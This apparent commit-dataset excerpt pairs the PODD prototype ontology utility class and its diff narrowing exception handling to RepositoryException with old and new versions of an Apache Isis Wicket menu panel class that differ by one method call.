* * TODO: Decide how to manage PODD Artifact ontologies that will typically have smaller * lifetimes than Schema Ontologies which will stay in the manager for the lifetime of the * manager, until the next shutdown or maintenance period when they may be changed. PODD * Artifact ontologies may import Schema Ontologies so their manager needs to be able to access * the list of Schema Ontologies. However, PODD Artifact ontologies must not stay in the manager * for long periods of time or they will cause unsustainable memory growth, particularly for * large ontologies with many versions. * * TODO: How does an edit conflict resolution strategy work in relation to this manager. * Ideally, we should also only be storing the latest version of a PODD Artifact in the manager. * If we are performing edit conflict resolution based solely on RDF triples and not OWL Axioms, * then we may be able to perform the diff externally. See the Protege OWL Diff code for * examples of how to diff ontologies. */ private OWLOntologyManager manager; /** * A factory for producing reasoners that are suitable according to owlProfile. */ private OWLReasonerFactory reasonerFactory; /** * The graph used to manage Schema Ontologies. This is distinct from the graph used to manage * PODD Artifacts. */ private URI schemaGraph; /** * The graph used to manage PODD Artifacts. This is distinct from the graph used to manage * Schema Ontologies. */ private URI artifactGraph; /** * The OWLProfile that matches the reasoners produced by the reasonerFactory. This enables a * faster pre-reasoner check to very that the ontology is in the profile before attempting to * reason over the entire ontology. */ private IRI owlProfile; /** * * @param nextManager * The OWLOntologyManager instance that will be used to store ontologies in memory. * @param nextOwlProfile * The IRI of the OWL Profile that matches the reasoner factory, and will be used to * check for basic consistency before using the reasoner. * @param nextReasonerFactory * The reasoner factory that will be used to create reasoners for consistency checks * and for inferring extra triples. * @param nextSchemaGraph * The Graph URI that will be used for storing the schema ontology management * statements. * @param nextPoddArtifactGraph * TODO * */ public PoddPrototypeUtils(final OWLOntologyManager nextManager, final IRI nextOwlProfile, final OWLReasonerFactory nextReasonerFactory, final URI nextSchemaGraph, final URI nextPoddArtifactGraph) { this.manager = nextManager; this.owlProfile = nextOwlProfile; this.reasonerFactory = nextReasonerFactory; this.schemaGraph = nextSchemaGraph; this.artifactGraph = nextPoddArtifactGraph; } /** * Checks the consistency of the ontology and returns the instance of OWLReasoner that was used * to check the consistency. * * @param nextOntology * The ontology to check for consistency. 
* @return An instance of OWLreasoner that was used to check the consistency.s * @throws Exception */ public OWLReasoner checkConsistency(final OWLOntology nextOntology) throws Exception { final OWLProfile nextProfile = OWLProfileRegistry.getInstance().getProfile(this.owlProfile); Assert.assertNotNull("Could not find profile in registry: " + this.owlProfile.toQuotedString(), nextProfile); final OWLProfileReport profileReport = nextProfile.checkOntology(nextOntology); if(!profileReport.isInProfile()) { this.log.error("Bad profile report count: {}", profileReport.getViolations().size()); this.log.error("Bad profile report: {}", profileReport); } Assert.assertTrue("Schema Ontology was not in the given profile: " + nextOntology.getOntologyID().toString(), profileReport.isInProfile()); // create an OWL Reasoner using the Pellet library and ensure that the reasoner thinks the // ontology is consistent so far // Use the factory that we found to create a reasoner over the ontology final OWLReasoner nextReasoner = this.reasonerFactory.createReasoner(nextOntology); // Test that the ontology was consistent with this reasoner // This ensures in the case of Pellet that it is in the OWL2-DL profile Assert.assertTrue("Ontology was not consistent: " + nextOntology.getOntologyID().toString(), nextReasoner.isConsistent()); return nextReasoner; } /** * Computes the inferences using the given reasoner, which has previously been setup based on an * ontology. * * @param nextReasoner * The reasoner to use to compute the inferences. * @param inferredOntologyID * The OWLOntologyID to use for the inferred ontology. This must be unique and not * previously used in either the repository or the OWLOntologyManager * @return An OWLOntology instance containing the axioms that were inferred from the original * ontology. * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public OWLOntology computeInferences(final OWLReasoner nextReasoner, final OWLOntologyID inferredOntologyID) throws ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { nextReasoner.precomputeInferences(InferenceType.CLASS_HIERARCHY); final InferredOntologyGenerator iog = new InferredOntologyGenerator(nextReasoner); final OWLOntology nextInferredAxiomsOntology = this.manager.createOntology(inferredOntologyID); iog.fillOntology(this.manager, nextInferredAxiomsOntology); return nextInferredAxiomsOntology; } /** * Dump the triples representing a given ontology into a Sesame Repository. * * @param nextOntology * The ontology to dump into the repository. * @param nextRepositoryConnection * The repository connection to dump the triples into. 
* @throws IOException * @throws RepositoryException */ public void dumpOntologyToRepository(final OWLOntology nextOntology, final RepositoryConnection nextRepositoryConnection) throws IOException, RepositoryException { try { // Create an RDFHandler that will insert all triples after they are emitted from OWLAPI // into a single context in the Sesame Repository final RDFInserter repositoryHandler = new RDFInserter(nextRepositoryConnection); repositoryHandler.enforceContext(nextOntology.getOntologyID().getVersionIRI().toOpenRDFURI()); // Render the triples out from OWLAPI into a Sesame Repository final RioRenderer renderer = new RioRenderer(nextOntology, this.manager, repositoryHandler, null, nextOntology.getOntologyID() .getVersionIRI().toOpenRDFURI()); renderer.render(); // Commit the current repository connection nextRepositoryConnection.commit(); } catch(final Exception e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * Generates a unique inferred ontology ID based on the original ontology ID version IRI. * * Both ontology IRI and version IRI for the resulting ontology ID are the same to ensure * consistency. * * @param originalOntologyID * The original ontology ID to use for naming the inferred ontology. * @return An instance of OWLOntologyID that can be used to name an inferred ontology. */ public OWLOntologyID generateInferredOntologyID(final OWLOntologyID originalOntologyID) { return new OWLOntologyID(IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI()), IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI())); } /** * Loads an ontology from a classpath resource, renames the ontology using the given * OWLOntologyID, checks the consistency of the ontology, infers statements from the ontology, * and stores the inferred statements. * * <br /> * * The given OWLOntologyID will be assigned to the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI in the given OWLOntologyID must be unique for this * process to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final OWLOntologyID newOWLOntologyID, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); // rename the ontology // This step is necessary for cases where the loaded ontology either does not have an // owl:versionIRI statement, or the versionIRI will not be unique in the repository. 
// IMPORTANT NOTE: // The version IRI must be unique in the manager before this step or the load will fail due // to the ontology already existing! // FIXME: To get around this we would need to load the ontology into memory as RDF // statements and modify it before loading it out of the in-memory ontology, which is very // possible... this.manager.applyChange(new SetOntologyID(nextOntology, newOWLOntologyID)); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a classpath resource, checks the consistency of the ontology, infers * statements from the ontology, and stores the inferred statements. * * <br /> * * The ontology IRI and version IRI are taken from inside the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI of the loaded ontology must be unique for this process * to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) 
method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a Sesame RepositoryConnection, given an optional set of contexts. * * @param conn * The Sesame RepositoryConnection object to use when loading the ontology. * @param contexts * An optional varargs array of contexts specifying the contexts to use when loading * the ontology. If this is missing the entire repository will be used. * @return An OWLOntology instance populated with the triples from the repository. * @throws Exception */ public OWLOntology loadOntology(final RepositoryConnection conn, final Resource... contexts) throws Exception { final RioMemoryTripleSource tripleSource = new RioMemoryTripleSource(conn.getStatements(null, null, null, true, contexts)); tripleSource.setNamespaces(conn.getNamespaces()); final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(tripleSource); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads an ontology from a Java Resource on the classpath. This is useful for loading test * resources. * * NOTE: We currently assume that the ontology will be in RDF/XML. Outside of the prototype we * cannot make this assumption as any RDF or OWL format may be used. * * @param ontologyResource * The classpath location of the test resource to load. * @return An OWLOntology instance populated with the triples from the classpath resource. * @throws Exception */ public OWLOntology loadOntology(final String ontologyResource) throws Exception { final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(new StreamDocumentSource(this.getClass() .getResourceAsStream(ontologyResource), new RDFXMLOntologyFormatFactory())); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads a PODD Artifact from the given classpath resource into the database and into the * OWLOntologyManager. * * This includes verifying that it fits with the expected profile, and verifying that it is * consistent with the configured reasoner. * * @param artifactResourcePath * @param nextRepositoryConnection * @return * @throws Exception */ public InferredOWLOntologyID loadPoddArtifact(final String artifactResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception { // 1. Create permanent identifiers for any impermanent identifiers in the object... // FIXME: May need to load the triples into a temporary location to rewrite the impermanent // identifiers before loading it into the OWLOntologyManager this.log.info("Loading podd artifact from: {}", artifactResourcePath); final OWLOntology nextOntology = this.loadOntology(artifactResourcePath); // 2. 
Validate the object in terms of the OWL profile // 3. Validate the object using a reasoner this.log.info("Checking consistency of podd artifact"); final OWLReasoner reasoner = this.checkConsistency(nextOntology); // 4. Store the object this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); // 5. Infer extra statements about the object using a reasoner this.log.info("Computing inferences for podd artifact"); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository // 6. Store the inferred statements this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // 7. Update the PODD Artifact management graph to contain the latest // update the link in the PODD Artifact management graph this.updateCurrentManagedPoddArtifactOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Removes the PODD Artifact from the OWLOntologyManager. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param poddArtifact * The InferredOWLOntologyID of the PODD Artifact to remove */ public void removePoddArtifactFromManager(final InferredOWLOntologyID poddArtifact) { Assert.assertTrue(this.manager.contains(poddArtifact)); this.removePoddArtifactFromManager(poddArtifact.getBaseOWLOntologyID(), poddArtifact.getInferredOWLOntologyID()); } /** * Removes the PODD Artifact from the OWLOntologyManager using two different OWLOntologyID * references for the base and inferred ontologies respectively. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param baseOntologyID * The base OWLOntologyID of the Artifact to be removed. * @param inferredOntologyID * The inferred OWLOntologyID of the Artifact to be removed. */ public void removePoddArtifactFromManager(final OWLOntologyID baseOntologyID, final OWLOntologyID inferredOntologyID) { Assert.assertTrue(this.manager.contains(baseOntologyID)); Assert.assertTrue(this.manager.contains(inferredOntologyID)); this.manager.removeOntology(baseOntologyID); Assert.assertFalse(this.manager.contains(baseOntologyID)); this.manager.removeOntology(inferredOntologyID); Assert.assertFalse(this.manager.contains(inferredOntologyID)); } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. 
* @throws RepositoryException */ public void updateCurrentManagedPoddArtifactOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.artifactGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.artifactGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.artifactGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.artifactGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final Exception e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. * @throws RepositoryException */ public void updateCurrentManagedSchemaOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. 
A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.schemaGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.schemaGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.schemaGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.schemaGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final Exception e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } }
Clean up try/catch blocks to react only to RepositoryException, avoiding catching and rethrowing all Exceptions
podd-prototype/src/main/java/com/github/podd/prototype/PoddPrototypeUtils.java
Clean up try/catch blocks to react only to RepositoryException, avoiding catching and rethrowing all Exceptions
<ide><path>odd-prototype/src/main/java/com/github/podd/prototype/PoddPrototypeUtils.java <ide> // Commit the current repository connection <ide> nextRepositoryConnection.commit(); <ide> } <del> catch(final Exception e) <add> catch(final RepositoryException e) <ide> { <ide> // if anything failed, rollback the connection before rethrowing the exception <ide> nextRepositoryConnection.rollback(); <ide> // if everything went well commit the connection <ide> nextRepositoryConnection.commit(); <ide> } <del> catch(final Exception e) <add> catch(final RepositoryException e) <ide> { <ide> // if anything failed, rollback the connection before rethrowing the exception <ide> nextRepositoryConnection.rollback(); <ide> // if everything went well commit the connection <ide> nextRepositoryConnection.commit(); <ide> } <del> catch(final Exception e) <add> catch(final RepositoryException e) <ide> { <ide> // if anything failed, rollback the connection before rethrowing the exception <ide> nextRepositoryConnection.rollback();
Java
apache-2.0
7d4ae1e3a600bf4f5ae4cf7e48eeeef2ee35aeec
0
sanderginn/isis,estatio/isis,apache/isis,niv0/isis,howepeng/isis,sanderginn/isis,kidaa/isis,peridotperiod/isis,incodehq/isis,apache/isis,oscarbou/isis,oscarbou/isis,niv0/isis,peridotperiod/isis,peridotperiod/isis,incodehq/isis,kidaa/isis,oscarbou/isis,apache/isis,estatio/isis,incodehq/isis,niv0/isis,oscarbou/isis,kidaa/isis,howepeng/isis,niv0/isis,peridotperiod/isis,estatio/isis,apache/isis,estatio/isis,kidaa/isis,incodehq/isis,howepeng/isis,howepeng/isis,apache/isis,apache/isis,sanderginn/isis,sanderginn/isis
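The diff in the record above replaces the broad catch(final Exception e) blocks with catch(final RepositoryException e), so only repository failures trigger the rollback-and-rethrow path while unrelated exceptions propagate untouched. Below is a minimal sketch of that pattern; the class and method names are made up for illustration, and only the Sesame/OpenRDF RepositoryConnection calls come from the record.

import org.openrdf.model.URI;
import org.openrdf.repository.RepositoryConnection;
import org.openrdf.repository.RepositoryException;

/**
 * Illustrative sketch of the commit/rollback idiom from the diff above.
 * Only RepositoryException is caught, so repository failures are rolled back
 * and rethrown while other exceptions pass through without touching the connection.
 */
public final class TransactionalAddSketch
{
    public static void addWithRollback(final RepositoryConnection connection, final URI subject,
            final URI predicate, final URI object, final URI context) throws RepositoryException
    {
        try
        {
            // stage the statement in the given context
            connection.add(subject, predicate, object, context);
            
            // if everything went well commit the connection
            connection.commit();
        }
        catch(final RepositoryException e)
        {
            // if anything failed, rollback the connection before rethrowing the exception
            connection.rollback();
            throw e;
        }
    }
}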
package org.apache.isis.viewer.wicket.ui.components.widgets.cssmenu; import de.agilecoders.wicket.core.markup.html.bootstrap.behavior.CssClassNameAppender; import de.agilecoders.wicket.extensions.markup.html.bootstrap.button.DropdownAutoOpenJavaScriptReference; import java.util.List; import com.google.common.base.Strings; import org.apache.wicket.markup.head.CssHeaderItem; import org.apache.wicket.markup.head.IHeaderResponse; import org.apache.wicket.markup.head.JavaScriptHeaderItem; import org.apache.wicket.markup.head.OnDomReadyHeaderItem; import org.apache.wicket.markup.html.basic.Label; import org.apache.wicket.markup.html.link.AbstractLink; import org.apache.wicket.markup.html.list.ListItem; import org.apache.wicket.markup.html.list.ListView; import org.apache.wicket.markup.html.panel.Fragment; import org.apache.wicket.markup.html.panel.Panel; import org.apache.wicket.request.resource.CssResourceReference; import org.apache.isis.viewer.wicket.ui.util.Components; import org.apache.isis.viewer.wicket.ui.util.CssClassAppender; /** * A panel responsible to render the application actions as menu in a navigation bar. * * <p> * The multi-level sub menu support is borrowed from * <a href="http://bootsnipp.com/snippets/featured/multi-level-dropdown-menu-bs3">Bootsnip</a> * </p> */ public class ApplicationActionsPanel extends Panel { /** * Constructor. * * @param id * the Wicket component id * @param menuItems * the menu items with their sub menu items */ public ApplicationActionsPanel(String id, List<CssMenuItem> menuItems) { super(id); ListView<CssMenuItem> menuItemsView = new ListView<CssMenuItem>("menuItems", menuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem menuItem = listItem.getModelObject(); listItem.add(new Label("name", menuItem.getName())); List<CssMenuItem> subMenuItems = menuItem.getSubMenuItems(); // fake data to test multi-level menus // if (menuItem.getName().equals("Text")) { // CssMenuItem fakeItem = menuItem.newSubMenuItem("Fake item").build(); // // fakeItem.newSubMenuItem("Fake item 1").link(new ExternalLink("menuLink", "http://abv.bg")).build(); // CssMenuItem fakeMenu12 = fakeItem.newSubMenuItem("Fake item 2").link(new ExternalLink("menuLink", "http://google.com")).build(); // // fakeMenu12.newSubMenuItem("Fake item 2.1").link(new ExternalLink("menuLink", "http://web.de")).build(); // } ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; listItem.add(subMenuItemsView); } }; add(menuItemsView); } private void addFolderItem(CssMenuItem subMenuItem, ListItem<CssMenuItem> listItem) { listItem.add(new CssClassAppender("dropdown-submenu")); Fragment folderItem = new Fragment("content", "folderItem", ApplicationActionsPanel.this); listItem.add(folderItem); folderItem.add(new Label("folderName", subMenuItem.getName())); ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItem.getSubMenuItems()) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; folderItem.add(subMenuItemsView); } private void 
addLeafItem(CssMenuItem menuItem, ListItem<CssMenuItem> listItem) { Fragment leafItem = new Fragment("content", "leafItem", ApplicationActionsPanel.this); AbstractLink subMenuItemLink = menuItem.getLink(); Label menuItemLabel = new Label("menuLinkLabel", menuItem.getName()); subMenuItemLink.addOrReplace(menuItemLabel); if (!menuItem.isEnabled()) { listItem.add(new CssClassNameAppender("disabled")); } if (menuItem.isPrototyping()) { listItem.add(new CssClassNameAppender("bg-warning")); } leafItem.add(subMenuItemLink); listItem.add(leafItem); String cssClassFa = menuItem.getCssClassFa(); if (Strings.isNullOrEmpty(cssClassFa)) { Components.permanentlyHide(subMenuItemLink, "menuLinkFontAwesome"); subMenuItemLink.add(new CssClassAppender("menuLinkSpacer")); } else { Label dummy = new Label("menuLinkFontAwesome", ""); dummy.add(new CssClassAppender(cssClassFa)); subMenuItemLink.addOrReplace(dummy); } } @Override public void renderHead(IHeaderResponse response) { super.renderHead(response); response.render(CssHeaderItem.forReference(new CssResourceReference(ApplicationActionsPanel.class, "ApplicationActionsPanel.css"))); response.render(JavaScriptHeaderItem.forReference(DropdownAutoOpenJavaScriptReference.instance())); response.render(OnDomReadyHeaderItem.forScript("$('.dropdown-toggle').dropdownHover();")); } }
component/viewer/wicket/ui/src/main/java/org/apache/isis/viewer/wicket/ui/components/widgets/cssmenu/ApplicationActionsPanel.java
package org.apache.isis.viewer.wicket.ui.components.widgets.cssmenu; import de.agilecoders.wicket.core.markup.html.bootstrap.behavior.CssClassNameAppender; import de.agilecoders.wicket.extensions.markup.html.bootstrap.button.DropdownAutoOpenJavaScriptReference; import java.util.List; import com.google.common.base.Strings; import org.apache.wicket.markup.head.CssHeaderItem; import org.apache.wicket.markup.head.IHeaderResponse; import org.apache.wicket.markup.head.JavaScriptHeaderItem; import org.apache.wicket.markup.head.OnDomReadyHeaderItem; import org.apache.wicket.markup.html.basic.Label; import org.apache.wicket.markup.html.link.AbstractLink; import org.apache.wicket.markup.html.list.ListItem; import org.apache.wicket.markup.html.list.ListView; import org.apache.wicket.markup.html.panel.Fragment; import org.apache.wicket.markup.html.panel.Panel; import org.apache.wicket.request.resource.CssResourceReference; import org.apache.isis.viewer.wicket.ui.util.Components; import org.apache.isis.viewer.wicket.ui.util.CssClassAppender; /** * A panel responsible to render the application actions as menu in a navigation bar. * * <p> * The multi-level sub menu support is borrowed from * <a href="http://bootsnipp.com/snippets/featured/multi-level-dropdown-menu-bs3">Bootsnip</a> * </p> */ public class ApplicationActionsPanel extends Panel { /** * Constructor. * * @param id * the Wicket component id * @param menuItems * the menu items with their sub menu items */ public ApplicationActionsPanel(String id, List<CssMenuItem> menuItems) { super(id); ListView<CssMenuItem> menuItemsView = new ListView<CssMenuItem>("menuItems", menuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem menuItem = listItem.getModelObject(); listItem.add(new Label("name", menuItem.getName())); List<CssMenuItem> subMenuItems = menuItem.getSubMenuItems(); // fake data to test multi-level menus // if (menuItem.getName().equals("Text")) { // CssMenuItem fakeItem = menuItem.newSubMenuItem("Fake item").build(); // // fakeItem.newSubMenuItem("Fake item 1").link(new ExternalLink("menuLink", "http://abv.bg")).build(); // CssMenuItem fakeMenu12 = fakeItem.newSubMenuItem("Fake item 2").link(new ExternalLink("menuLink", "http://google.com")).build(); // // fakeMenu12.newSubMenuItem("Fake item 2.1").link(new ExternalLink("menuLink", "http://web.de")).build(); // } ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; listItem.add(subMenuItemsView); } }; add(menuItemsView); } private void addFolderItem(CssMenuItem subMenuItem, ListItem<CssMenuItem> listItem) { listItem.add(new CssClassAppender("dropdown-submenu")); Fragment folderItem = new Fragment("content", "folderItem", ApplicationActionsPanel.this); listItem.add(folderItem); folderItem.add(new Label("folderName", subMenuItem.getName())); ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItem.getSubMenuItems()) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; folderItem.add(subMenuItemsView); } private void 
addLeafItem(CssMenuItem menuItem, ListItem<CssMenuItem> listItem) { Fragment leafItem = new Fragment("content", "leafItem", ApplicationActionsPanel.this); AbstractLink subMenuItemLink = menuItem.getLink(); Label menuItemLabel = new Label("menuLinkLabel", menuItem.getName()); subMenuItemLink.addOrReplace(menuItemLabel); if (!menuItem.isEnabled()) { listItem.add(new CssClassNameAppender("disabled")); } if (menuItem.isPrototyping()) { listItem.add(new CssClassNameAppender("bg-warning")); } leafItem.add(subMenuItemLink); listItem.add(leafItem); String cssClassFa = menuItem.getCssClassFa(); if (Strings.isNullOrEmpty(cssClassFa)) { Components.permanentlyHide(subMenuItemLink, "menuLinkFontAwesome"); subMenuItemLink.add(new CssClassAppender("menuLinkSpacer")); } else { Label dummy = new Label("menuLinkFontAwesome", ""); dummy.add(new CssClassAppender(cssClassFa)); subMenuItemLink.add(dummy); } } @Override public void renderHead(IHeaderResponse response) { super.renderHead(response); response.render(CssHeaderItem.forReference(new CssResourceReference(ApplicationActionsPanel.class, "ApplicationActionsPanel.css"))); response.render(JavaScriptHeaderItem.forReference(DropdownAutoOpenJavaScriptReference.instance())); response.render(OnDomReadyHeaderItem.forScript("$('.dropdown-toggle').dropdownHover();")); } }
